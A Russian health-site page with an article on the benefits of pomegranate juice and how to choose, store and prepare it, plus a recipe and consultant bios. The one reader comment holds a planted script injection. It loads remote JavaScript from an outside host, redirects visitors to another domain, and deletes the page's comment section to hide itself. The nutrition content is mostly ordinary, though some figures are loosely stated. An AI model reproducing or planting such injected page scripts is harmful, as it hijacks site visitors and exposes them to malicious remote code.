Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Гранат. Ягода, которая за...  >>  Гранат. Ягода, которая защищает от воспалений
 
Обратная связь
 

Гранат. Ягода, которая защищает от воспалений

Размер шрифта
06 декабря 2011 07:13
  • google_analytics: false
  • Нравится

Зерна граната – ценный продукт, а сок из него – подлинное сокровище. Как правильно выбрать, как хранить и как приготовить гранатовый сок. 

Чем полезен гранат?

1. Содержит полифенолы. Это природные антиоксидантны, которые борются со свободными радикалами, виновниками онкологических заболеваний и преждевременного старения. Полифенолы препятствуют образованию атеросклеротических бляшек, а значит, защищают от заболеваний сердца и сосудов.
2. Органические кислоты граната стимулируют пищеварение.
3. Гранат богат пектинами, которые помогают при воспалительных заболеваниях желудочно-кишечного тракта, улучшают аппетит и пищеварение в целом.
4. В гранате много дубильных веществ. Они делают слизистую маловосприимчивой к раздражающим факторам, тем самым защищая их инфекций, и снимают воспаление при гастритах и воспалении десен.
5. Гранат – это низкокалорийный продукт. В 100 граммах – всего 62 ккал.

Пьедестал почета по содержанию дубильных веществ
1. Гранатовый сок – 0,82 мг
2. Грушевый сок – 0,29 мг
3. Яблочный сок – 0 мг

Как выбрать

  • Ищите производителя. Если он не указан, сок покупать нельзя.
  • На упаковке должно быть написано «сок гранатовый прямого отжима, сорт высший».
  • Не покупайте нектар. Это значит, что сок был разбавлен минимум 5-7 раз.
  • В составе сока не должно быть красителей.
  • Сок не должен содержит сахарозу.
  • В натуральном гранатовом соке не может быть сорбиновой кислоты – это консервант.

Как хранить

  • Свежий гранатовый сок хранится в холодильнике 2-3 дня. Самый полезный сок – только что приготовленный самостоятельно. Хранить такой сок не стоит, лучше сразу выпить.
  • Стерилизованный сок граната в банках может храниться гораздо дольше – до 1 года.
Как приготовить
  • Покатайте гранат по столу, слегка нажимая на плод.
  • Когда гранат станет мягким, сделайте небольшой надрез возле его «корешка» и отожмите сок в емкость.
  • Разбавить сок можно водой или свекольным соком. Так вы защитите эмаль зубов от воздействия кислоты.
Рецепт гранатового коктейля

1. Очистить 5 плодов граната от кожуры и удалить все перегородки и пленки.
2. Бросить очищенные зерна граната в соковыжималку.
3. Отжать в соковыжималке морковь, так, чтобы получилось соотношение с гранатовым соком 1:1.
4. Украсьте кружочком лайма и веточкой мяты, добавьте кубики льда.

Видеосжеты по теме:

Гранатовый сок. Целебный напиток

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:04

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.